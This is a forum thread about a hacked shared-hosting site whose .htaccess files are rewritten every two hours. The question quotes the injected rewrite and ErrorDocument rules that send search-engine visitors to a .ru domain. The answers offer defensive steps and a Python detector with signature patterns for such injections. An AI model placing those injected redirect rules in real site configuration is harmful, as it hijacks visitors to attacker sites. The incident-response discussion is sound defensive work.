shared hosting with malware, .htaccess file gets modified every 2 hours or so

I spent all day today chasing malware on the shared hosting for one of my clients.

The issue is as follows: every 2 hours or so the .htaccess file and all other .htaccess files get modified; at the top of the file these lines are added:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>

and on the bottom:

ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

The main problem is that I'm not root on the server and cannot sudo, as this is shared hosting with hundreds of websites. Typical useful commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root.

I can't find out who is modifying the .htaccess files; how do I get that information? My guess is that some PHP script, called from outside via command and control, is changing them.

This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/

How do I find out who is modifying the .htaccess files without being root?


Solution 1:

Without root or access to diagnostic tools, you'd be beating your head against the wall. You could grep through files looking for that .ru domain to see if it's something under your control.

There are tools you could take a shot in the dark with and try: inotify, lsof (not likely), or simply chowning the .htaccess file so it is not writable by Apache (if possible). If it's every two hours, look at the crontab as well.

In the end, something's still buggered, and you should probably refer to this: How do I deal with a compromised server?

Solution 2:

First of all, you should also ask your hosting provider for help; they would want to know that one of the websites they host has been hacked. It is possible that the entire server is compromised. In that case, it would be your provider's responsibility to transfer your website to another, secure server so they can analyze, clean up and reinstall.

In any case, you should ask them to correlate the date/time of the modified .htaccess file with any logs they have: access.log, auth.log, FTP server logs, etc.

Also, it can be useful to compare the files on your website with a recent backup so you can see what else has been modified.
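A small unprivileged helper that combines the two suggestions above (grep the .htaccess files for the injected redirect, then correlate the modification time with every other file touched in the same window) can be run from the hosting account's shell or cron. It is an added example, not code from the question or the answers; the 900-second window, the structural signatures and the web-root layout are assumptions.

```python
import os
import re
import time
from pathlib import Path

# Lines shaped like the injection quoted in the question: a referer-conditioned
# rewrite to an off-site URL, or ErrorDocument pointing at an absolute URL.
# Assumption: the redirect host changes between campaigns, so the checks are
# structural and do not hard-code the .ru domain.
SIGNATURES = [
    re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}.*\b(google|yahoo|bing)\b", re.I),
    re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I),
    re.compile(r"^\s*ErrorDocument\s+[45]\d\d\s+https?://", re.I),
]


def injected_lines(text):
    """Return the lines of an .htaccess body that match a known injection shape."""
    return [ln.strip() for ln in text.splitlines()
            if any(sig.search(ln) for sig in SIGNATURES)]


def scan(root, window=900):
    """Walk `root` (no root privileges needed), flag infected .htaccess files and
    list every other file whose mtime lies within `window` seconds of the
    infection: candidates for the dropper, or files it rewrote in the same run.
    Hand the reported timestamps to the provider to match against their logs."""
    root = Path(root)
    files = [p for p in root.rglob("*") if p.is_file()]
    report = {}
    for ht in (p for p in files if p.name == ".htaccess"):
        bad = injected_lines(ht.read_text(errors="replace"))
        if not bad:
            continue
        t = ht.stat().st_mtime
        nearby = sorted(str(p.relative_to(root)) for p in files
                        if p != ht and abs(p.stat().st_mtime - t) <= window)
        report[str(ht.relative_to(root))] = {
            "modified": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(t)),
            "injected": bad,
            "modified_around_same_time": nearby,
        }
    return report


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(scan(sys.argv[1] if len(sys.argv) > 1 else "."), indent=2))
```

Run it from cron every few minutes and keep the output; the first run that reports a hit gives you the exact minute to ask the provider to look up in access.log and the FTP log.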